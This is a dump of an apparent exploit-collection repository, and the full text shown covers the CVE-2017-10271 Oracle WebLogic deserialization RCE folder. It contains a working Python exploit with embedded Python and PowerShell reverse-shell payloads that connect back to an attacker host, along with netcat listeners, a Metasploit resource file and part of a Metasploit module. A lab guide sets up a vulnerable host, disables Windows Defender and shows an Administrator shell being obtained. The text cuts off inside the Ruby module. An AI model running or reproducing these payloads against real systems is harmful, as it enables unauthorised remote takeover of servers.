├── .gitignore ├── CVE-2017-10271 ├── CVE-2017-10271.py ├── LICENSE ├── README.md ├── docker │ ├── Dockerfile │ └── README.md ├── listeners │ ├── nc-exploit-listener.sh │ ├── py2-check-listener.sh │ └── py3-check-listener.sh ├── msf-linux-runner.rc ├── oracle_weblog_wsat_rce.rb ├── original-poc │ └── original-poc.py ├── scanners │ ├── LICENSE │ ├── Makefile │ ├── README.md │ ├── bin │ │ ├── CVE-2017-10271.release.1.5.1.amd64.darwin │ │ ├── CVE-2017-10271.release.1.5.1.amd64.dragonfly │ │ ├── CVE-2017-10271.release.1.5.1.amd64.freebsd │ │ ├── CVE-2017-10271.release.1.5.1.amd64.linux │ │ ├── CVE-2017-10271.release.1.5.1.amd64.netbsd │ │ ├── CVE-2017-10271.release.1.5.1.amd64.openbsd │ │ ├── CVE-2017-10271.release.1.5.1.amd64.solaris │ │ └── CVE-2017-10271.release.1.5.1.amd64.windows.exe │ ├── cmd │ │ ├── root.go │ │ └── version.go │ ├── libcve201710271 │ │ ├── banner.go │ │ ├── config.go │ │ ├── payload.go │ │ ├── request.go │ │ ├── target.go │ │ ├── urls.go │ │ └── workers.go │ └── main.go └── vulnerable_machine_setup.md ├── CVE-2017-11882 ├── CVE-2017-11882.py ├── README.md └── a.doc ├── README.md ├── StrutsPOCV2.0.jar ├── cve-2016-6662 ├── cve-2016-6662_MySQL_RCE_exploit.py └── mysql_hookandroot_lib.c ├── dedecms ├── found_admin_login_page.php └── found_admin_login_page.py ├── iis6_exploit.py ├── imageMagic ├── command.jpg ├── command2.jpg ├── command3.jpg └── ssrf.jpg ├── jenkins └── CVE-2018-1999002.py ├── phpcms └── phpcmsv9.6.0_sqli.py ├── struts2 ├── .DS_Store ├── readme.txt ├── s2-045 │ ├── st2-045.py │ └── tmp.txt ├── s2-046 │ └── s2-046.sh └── struts2-exp.py ├── webdav_exec_CVE-2017-11882.py ├── weblogicANDjbossTool ├── DeserializeExploit.jar ├── JBOSS_EXP.jar ├── WebLogicExploit.jar └── WebLogic_EXP.jar └── zabbixPwn.py /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /CVE-2017-10271/CVE-2017-10271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Exploit Title: Weblogic wls-wsat Component Deserialization RCE 4 | # Date Authored: Jan 3, 2018 5 | # Date Announced: 10/19/2017 6 | # Exploit Author: Kevin Kirsche (d3c3pt10n) 7 | # Exploit Github: https://github.com/kkirsche/CVE-2017-10271 8 | # Exploit is based off of POC by Luffin from Github 9 | # https://github.com/Luffin/CVE-2017-10271 10 | # Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html 11 | # Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 12 | # Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS 13 | # CVE: CVE-2017-10271 14 | # Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/ 15 | # (Python 3) Example check listener: python3 -m http.server 4444 16 | # (Python 2) Example check listener: python -m SimpleHTTPServer 4444 17 | # (Netcat) Example exploit listener: nc -nlvp 4444 18 | 19 | from sys import exit 20 | from requests import post 21 | from argparse import ArgumentParser 22 | from random import choice 23 | from string import ascii_uppercase, ascii_lowercase, digits 24 | from xml.sax.saxutils import escape 25 | 26 | class Exploit: 27 | 28 | def __init__(self, check, rhost, lhost, lport, windows): 29 | self.url = rhost if not rhost.endswith('/') else rhost.strip('/') 30 | self.lhost = lhost 31 | self.lport = lport 32 | self.check = check 33 | if windows: 34 | self.target = 'win' 35 | else: 36 | self.target = 'unix' 37 | 38 | if self.target == 'unix': 39 | # Unix reverse shell 40 | # You should also be able to instead use something from MSFVenom. E.g. 41 | # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444 42 | self.cmd_payload = ( 43 | "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket." 44 | "SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(" 45 | "s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" 46 | ).format(lhost=self.lhost, lport=self.lport) 47 | else: 48 | # Windows reverse shell 49 | # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444 50 | self.cmd_payload = ( 51 | r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) " 52 | r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost +"" 53 | r"';$p='"+ self.lport + "';$c=New-Object system.net.sockets.tcpclient;$c.connect($a" 54 | r",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;" 55 | r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';" 56 | r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;" 57 | r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;" 58 | r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;" 59 | r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};" 60 | r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;" 61 | r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)" 62 | r" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;" 63 | r"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};" 64 | r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if " 65 | r"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne" 66 | r" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e." 67 | r"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};" 68 | ) 69 | self.cmd_payload = escape(self.cmd_payload) 70 | 71 | def cmd_base(self): 72 | if self.target == 'win': 73 | return 'cmd' 74 | return '/bin/sh' 75 | 76 | def cmd_opt(self): 77 | if self.target == 'win': 78 | return '/c' 79 | return '-c' 80 | 81 | 82 | def get_generic_check_payload(self): 83 | random_uri = ''.join( 84 | choice(ascii_uppercase + ascii_lowercase + digits) 85 | for _ in range(16)) 86 | generic_check_payload = ''' 87 | 88 | 89 | 90 | 91 | http://{lhost}:{lport}/{random_uri} 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | ''' 102 | 103 | return generic_check_payload.format( 104 | lhost=self.lhost, lport=self.lport, random_uri=random_uri) 105 | 106 | def get_process_builder_payload(self): 107 | process_builder_payload = ''' 108 | 109 | 110 | 111 | 112 | 113 | 114 | {cmd_base} 115 | 116 | 117 | {cmd_opt} 118 | 119 | 120 | {cmd_payload} 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | ''' 131 | return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(), 132 | cmd_payload=self.cmd_payload) 133 | 134 | def print_banner(self): 135 | print("=" * 80) 136 | print("CVE-2017-10271 RCE Exploit") 137 | print("written by: Kevin Kirsche (d3c3pt10n)") 138 | print("Remote Target: {rhost}".format(rhost=self.url)) 139 | print("Shell Listener: {lhost}:{lport}".format( 140 | lhost=self.lhost, lport=self.lport)) 141 | print("=" * 80) 142 | 143 | def post_exploit(self, data): 144 | headers = { 145 | "Content-Type": 146 | "text/xml;charset=UTF-8", 147 | "User-Agent": 148 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" 149 | } 150 | payload = "/wls-wsat/CoordinatorPortType" 151 | 152 | vulnurl = self.url + payload 153 | try: 154 | req = post( 155 | vulnurl, data=data, headers=headers, timeout=10, verify=False) 156 | if self.check: 157 | print("[*] Did you get an HTTP GET request back?") 158 | else: 159 | print("[*] Did you get a shell back?") 160 | except Exception as e: 161 | print('[!] Connection Error') 162 | print(e) 163 | 164 | def run(self): 165 | self.print_banner() 166 | if self.check: 167 | print('[+] Generating generic check payload') 168 | payload = self.get_generic_check_payload() 169 | else: 170 | print('[+] Generating execution payload') 171 | payload = self.get_process_builder_payload() 172 | print('[*] Generated:') 173 | print(payload) 174 | if self.check: 175 | print('[+] Running generic check payload') 176 | else: 177 | print('[+] Running {target} execute payload'.format(target=self.target)) 178 | 179 | self.post_exploit(data=payload) 180 | 181 | 182 | if __name__ == "__main__": 183 | parser = ArgumentParser( 184 | description= 185 | 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.' 186 | ) 187 | parser.add_argument( 188 | '-l', 189 | '--lhost', 190 | required=True, 191 | dest='lhost', 192 | nargs='?', 193 | help='The listening host that the remote server should connect back to') 194 | parser.add_argument( 195 | '-p', 196 | '--lport', 197 | required=True, 198 | dest='lport', 199 | nargs='?', 200 | help='The listening port that the remote server should connect back to') 201 | parser.add_argument( 202 | '-r', 203 | '--rhost', 204 | required=True, 205 | dest='rhost', 206 | nargs='?', 207 | help='The remote host base URL that we should send the exploit to') 208 | parser.add_argument( 209 | '-c', 210 | '--check', 211 | dest='check', 212 | action='store_true', 213 | help= 214 | 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.' 215 | ) 216 | parser.add_argument( 217 | '-w', 218 | '--win', 219 | dest='windows', 220 | action='store_true', 221 | help= 222 | 'Use the windows cmd payload instead of unix payload (execute mode only).' 223 | ) 224 | 225 | args = parser.parse_args() 226 | 227 | exploit = Exploit( 228 | check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport, 229 | windows=args.windows) 230 | exploit.run() 231 | -------------------------------------------------------------------------------- /CVE-2017-10271/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /CVE-2017-10271/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-10271 2 | 3 | Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script 4 | 5 | ### Usage 6 | 7 | ```bash 8 | $ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/ 9 | ``` 10 | 11 | ### Features 12 | 13 | * Standalone Python script 14 | * Check functionality to see if any host is vulnerable 15 | * Exploit functionality for Linux targets 16 | * Metasploit module 17 | * Check functionality to see if any host is vulnerable 18 | * Exploit functionality for all targets 19 | * Scanner (./scanners) 20 | * Checks to see if hosts is vulnerable. Fully self-contained 21 | 22 | ## Legal Notices 23 | 24 | You are responsible for the use of this script. Kevin Kirsche takes no responsibility for any actions taken using the code here. The code was created for teams looking to validate the security of their servers, not for malicious use. 25 | 26 | ## Thanks 27 | 28 | Big thanks to Luffin for creating the original POC that this was based on https://github.com/Luffin/CVE-2017-10271 29 | 30 | ## Vulnerable URL's other than the one shown: 31 | 32 | ``` 33 | /wls-wsat/CoordinatorPortType 34 | /wls-wsat/CoordinatorPortType11 35 | /wls-wsat/ParticipantPortType 36 | /wls-wsat/ParticipantPortType11 37 | /wls-wsat/RegistrationPortTypeRPC 38 | /wls-wsat/RegistrationPortTypeRPC11 39 | /wls-wsat/RegistrationRequesterPortType 40 | /wls-wsat/RegistrationRequesterPortType11 41 | ``` 42 | 43 | ## Related Vulnerability 44 | CVE 2017-3506 45 | 46 | ## Oracle's Patch 47 | 48 | Source: 49 | https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/ 50 | 51 | ```java 52 | private void validate(InputStream is) { 53 | WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory(); 54 | 55 | try { 56 | SAXParser parser = factory.newSAXParser(); 57 | 58 | parser.parse(is, new DefaultHandler()) { 59 | private int overallarraylength = 0; 60 | 61 | public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception { 62 | if (qName.equalsIgnoreCase("object")) { 63 | throw new IllegalStateException("Invalid element qName:object"); 64 | } else if (qName.equalsIgnoreCase("new")) { 65 | throw new IllegalStateException("Invalid element qName:new"); 66 | } else if (qName.equalsIgnoreCase("method")) { 67 | throw new IllegalStateException("Invalid element qName:method"); 68 | } else { 69 | if (qName.equalsIgnoreCase("void")) { 70 | for(int attClass = 0;attClass < attributes.getLength(); ++attClass) { 71 | if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) { 72 | throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass)); 73 | } 74 | } 75 | } 76 | 77 | ... more code here ... 78 | } 79 | } 80 | } 81 | } 82 | } 83 | ``` 84 | -------------------------------------------------------------------------------- /CVE-2017-10271/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM zhiqzhao/ubuntu_weblogic1036_domain 2 | RUN apt-get update && apt-get -y install python 3 | -------------------------------------------------------------------------------- /CVE-2017-10271/docker/README.md: -------------------------------------------------------------------------------- 1 | # Vulnerable Application 2 | 3 | Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution. 4 | 5 | ### Windows: Setting up a vulnerable application 6 | 7 | We successfully tested this exploit against a fully-patched, Windows 10 (x64) target. Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM. 8 | 9 | 1. [Download](http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html) Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (`wls1036_win32.exe`). 10 | 2. Run the installer. (See [here] for detailed instructions.) You may be prompted to install a Java Development Kit (JDK). [JDK 8u151 x64](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) was verified working. 11 | 3. Windows Defender will block the payload from executing, so you may need to [temporarily](https://support.microsoft.com/en-us/help/4027187/windows-turn-off-windows-defender-antivirus) or [permanently](https://www.windowscentral.com/how-permanently-disable-windows-defender-windows-10) disable it. 12 | 4. Run the configuration wizard and [create a new weblogic domain](https://docs.oracle.com/cd/E29542_01/web.1111/e14140/newdom.htm#WLDCW192). Domain names and credentials are irrelevant. At the conclusion of the wizard, click "Start Admin Server". 13 | 5. The `startWebLogic.cmd` should run immediately after the installer and present logging output. Once running, the window should output a line similar to the following 14 | ``` 15 | 16 | 17 | ``` 18 | 19 | ### Windows: Attacking a vulnerable application 20 | 21 | Attack the above Windows server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`: 22 | 23 | ``` 24 | msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce 25 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target] 26 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0 27 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell 28 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker] 29 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run 30 | 31 | [*] Started reverse TCP handler on 192.168.108.1:4444 32 | [*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600 33 | 34 | Microsoft Windows [Version 10.0.16299.192] 35 | (c) 2017 Microsoft Corporation. All rights reserved. 36 | 37 | C:\Oracle\Middleware\user_projects\domains\admindomain>whoami 38 | weblogic-server\Administrator 39 | ``` 40 | 41 | ### Unix: Setting up a vulnerable environment 42 | 43 | 1. If necessary, install Docker.io. [These instructions](https://www.ptrace-security.com/2017/06/14/how-to-install-docker-on-kali-linux-2017-1/) were tested on a Kali 2017.3 VM: 44 | 45 | ``` 46 | apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D 47 | echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list 48 | apt update 49 | apt-get install docker-engine 50 | service docker start 51 | docker run hello-world 52 | ``` 53 | 54 | 2. Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0: 55 | ``` 56 | docker run -d -p7001:7001 -p80:7001 kkirsche/cve-2017-10271 57 | ``` 58 | 59 | 3. Confirm that the container is up. 60 | ``` 61 | docker ps 62 | ``` 63 | -------------------------------------------------------------------------------- /CVE-2017-10271/listeners/nc-exploit-listener.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "[+] Starting listener on port 4444" 4 | nc -nlvp 4444 5 | -------------------------------------------------------------------------------- /CVE-2017-10271/listeners/py2-check-listener.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "[+] Installing requests dependency" 4 | pip install -U requests 5 | 6 | echo "[+] Starting listener on port 4444" 7 | python -m SimpleHTTPServer 4444 8 | -------------------------------------------------------------------------------- /CVE-2017-10271/listeners/py3-check-listener.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "[+] Installing requests dependency" 4 | pip3 install -U requests 5 | 6 | echo "[+] Starting listener on port 4444" 7 | python3 -m http.server 4444 8 | -------------------------------------------------------------------------------- /CVE-2017-10271/msf-linux-runner.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce 2 | set RHOST pwned.com 3 | set TARGET 1 4 | set PAYLOAD cmd/unix/reverse_python 5 | set LHOST eth0 6 | set LPORT 4444 7 | exploit 8 | -------------------------------------------------------------------------------- /CVE-2017-10271/oracle_weblog_wsat_rce.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | class MetasploitModule < Msf::Exploit::Remote 7 | Rank = ExcellentRanking 8 | 9 | include Msf::Exploit::Remote::HttpClient 10 | # include Msf::Exploit::Remote::HttpServer 11 | 12 | def initialize(info = {}) 13 | super( 14 | update_info( 15 | info, 16 | 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', 17 | 'Description' => %q( 18 | The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization 19 | remote code execution vulnerability. Supported versions that are affected are 20 | 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin 21 | of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, 22 | HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check 23 | and will not be used when executing the exploit itself. 24 | ), 25 | 'License' => MSF_LICENSE, 26 | 'Author' => [ 27 | 'Kevin Kirsche ', # Metasploit module 28 | 'Luffin', # Proof of Concept 29 | 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery 30 | ], 31 | 'References' => 32 | [ 33 | ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin 34 | ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept 35 | ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit 36 | ['CVE', '2017-10271'], 37 | ['EDB', '43458'] 38 | ], 39 | 'Platform' => %w{ win unix }, 40 | 'Arch' => [ ARCH_CMD ], 41 | 'Targets' => 42 | [ 43 | [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], 44 | [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] 45 | ], 46 | 'DisclosureDate' => "Oct 19 2017", 47 | # Note that this is by index, rather than name. It's generally easiest 48 | # just to put the default at the beginning of the list and skip this 49 | # entirely. 50 | 'DefaultTarget' => 0 51 | ) 52 | ) 53 | 54 | register_options([ 55 | OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), 56 | OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]), 57 | OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]), 58 | # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) 59 | ]) 60 | end 61 | 62 | def cmd_base 63 | if target['Platform'] == 'win' 64 | return 'cmd' 65 | else 66 | return '/bin/sh' 67 | end 68 | end 69 | 70 | def cmd_opt 71 | if target['Platform'] == 'win' 72 | return '/c' 73 | else 74 | return '-c' 75 | end 76 | end 77 | 78 | 79 | # 80 | # This generates a XML payload that will execute the desired payload on the RHOST 81 | # 82 | def exploit_process_builder_payload 83 | # Generate a payload which will execute on a *nix machine using /bin/sh 84 | xml = %Q{ 85 | 86 | 87 | 88 | 89 | 90 | 91 | #{cmd_base} 92 | 93 | 94 | #{cmd_opt} 95 | 96 | 97 | #{payload.encoded.encode(xml: :text)} 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | } 107 | end 108 | 109 | # 110 | # This builds a XML payload that will generate a HTTP GET request to our SRVHOST 111 | # from the target machine. 112 | # 113 | def check_process_builder_payload 114 | xml = %Q{ 115 | 116 | 117 | 118 | 119 | #{get_uri.encode(xml: :text)} 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | } 129 | end 130 | 131 | # 132 | # In the event that a 'check' host responds, we should respond randomly so that we don't clog up 133 | # the logs too much with a no response error or similar. 134 | # 135 | def on_request_uri(cli, request) 136 | random_content = '

